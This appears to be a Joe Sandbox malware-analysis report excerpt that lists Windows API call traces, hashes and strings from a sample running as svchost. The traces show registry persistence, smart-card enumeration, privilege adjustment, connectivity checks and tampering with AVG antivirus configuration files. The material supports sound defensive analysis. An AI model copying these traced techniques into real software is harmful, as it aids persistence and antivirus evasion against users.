                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38EA
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38F8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                • String ID: 9e938dd0a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2510291871-1418632313
                                                                                                                                                                                                                • Opcode ID: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                                • Instruction ID: 72f9eb0a350d877dc83aa5de527ef66f268be27ba4172f40b2360f624016b842
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F036B5B40304FBEB20CAA1CD4AFAA777CEF04744F504494FB01D7140D7B1AA109795
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD96E6
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BD96ED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BD96FA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BD9701
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD9710
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BD9713
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BD9720
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BD9723
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: 7f55d36ed05eafd1dbe4d4d6453e2716345344de9a9cb730a58166b852bb70c2
                                                                                                                                                                                                                • Instruction ID: 46a71b57f341be64db6ccb3e1155b4f3001a07df70fdade598de3d147e83aca6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f55d36ed05eafd1dbe4d4d6453e2716345344de9a9cb730a58166b852bb70c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A31C475A00704ABDB20DF79D848BDBBBB8FF84314F048999ED59AB241E730D951CBA0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                                • Instruction ID: 3597fc924cee0faf7a5fc5a14788891d31f161c4a9f7e79458bc170d146ce235
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A01B172A86204ABD720ABF5FC88F9B7B5CEB84B95F014A23F60487100D7369810CBF0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02BD8AF4
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02BD9447), ref: 02BD8B0E
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,02BD9447), ref: 02BD8B36
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02BD9447), ref: 02BD8B42
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02BD9447), ref: 02BD8B6E
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00140B17,02BD9447,00000000,00140B17), ref: 02BD8BA0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3741995677-0
                                                                                                                                                                                                                • Opcode ID: b008d2694f0508dc64ad7984f9fba0f21e2e7c2b89677274535306005b6bd81a
                                                                                                                                                                                                                • Instruction ID: 04f908a253ad6f4c3636997d0aa294500076e886082e2bd7ef4281fdd2832de8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b008d2694f0508dc64ad7984f9fba0f21e2e7c2b89677274535306005b6bd81a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC316DB2B00609BBD710DF59D881BAAF7B8FF58715F10829AEA0497740E771AD61CBD0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02BC6A83,00000000), ref: 02BD5875
                                                                                                                                                                                                                • SCardListReadersA.WINSCARD(02BC6A83,00000000,?,FFFFFFFF), ref: 02BD588C
                                                                                                                                                                                                                • SCardConnectA.WINSCARD(02BC6A83,?,00000002,00000003,?,?), ref: 02BD58BE
                                                                                                                                                                                                                • SCardDisconnect.WINSCARD(?,00000000), ref: 02BD58E9
                                                                                                                                                                                                                • SCardFreeMemory.WINSCARD(02BC6A83,?), ref: 02BD5905
                                                                                                                                                                                                                • SCardReleaseContext.WINSCARD(02BC6A83), ref: 02BD5913
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3231658416-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustCloseConvertErrorFreeHandleInfoLastLocalLookupNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 2236266002-820036962
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02BB3B17), ref: 02BB3864
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,9e938dd0a,00000000,?,00000000,?), ref: 02BB3885
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 02BB3893
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                • String ID: 9e938dd0a$software\microsoft
                                                                                                                                                                                                                • API String ID: 3677997916-1418632313
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02BD9234), ref: 02BD8D83
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02BD9234), ref: 02BD8DAB
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02BD9234), ref: 02BD8DD5
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02BD9234), ref: 02BD8DE3
                                                                                                                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,02BD9234,?), ref: 02BD8DF5
                                                                                                                                                                                                                  • Part of subcall function 02BD8890: GetFileType.KERNEL32(?,00000000,00000000), ref: 02BD8899
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 60630809-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75570F10), ref: 02BC4FE7
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75570F10), ref: 02BC5045
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,75570F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2160739018-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02BC80CA
                                                                                                                                                                                                                • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02BC8108
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02BC8123
                                                                                                                                                                                                                • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02BC812A
                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02BC8151
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 433761119-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000,?), ref: 02BD8C37
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C57
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C68
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C81
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,02BD98B8,00000000,00000000,75572F00,?,02BC3CFD,00000000,00000000,00000000,00000000), ref: 02BD8C92
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD96E6
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapValidate.KERNEL32(00000000), ref: 02BD96ED
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?), ref: 02BD96FA
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapFree.KERNEL32(00000000), ref: 02BD9701
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02BD9710
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapValidate.KERNEL32(00000000), ref: 02BD9713
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: GetProcessHeap.KERNEL32(00000000,?), ref: 02BD9720
                                                                                                                                                                                                                  • Part of subcall function 02BD9680: HeapFree.KERNEL32(00000000), ref: 02BD9723
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3732962355-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02BC80CA
                                                                                                                                                                                                                • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02BC8108
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02BC8123
                                                                                                                                                                                                                • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02BC812A
                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02BC8151
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 433761119-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB6AB4
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: RegSetValueExA.ADVAPI32(?,9E9388F8a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                                  • Part of subcall function 02BB6980: RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AE4
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB6AE7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AF4
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 02BB6AF7
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                                  • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1728208919-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,02BC8E9D,?,?,?,?,?,?), ref: 02BB7987
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB7992
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB799A
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BB79A5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1233776721-0
APIs
• SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
• MoveFileA.KERNEL32(?,?), ref: 0040252F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
• API ID: FileFolderMovePath
• String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
• API String ID: 1404575960-1083204512
APIs
• OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7742FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
• GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
• GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
Memory Dump Source
• Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
• API ID: HandleProcess$CloseInformationOpenTimes
• String ID:
• API String ID: 3228293703-0
APIs
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,02BD5632,00004D42), ref: 02BB7638
• LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000,?,?,02BD5632,00004D42), ref: 02BB7647
• WriteFile.KERNEL32(00000000,02BD5632,0000000E,00004D42,00000000,?,?,02BD5632,00004D42), ref: 02BB7659
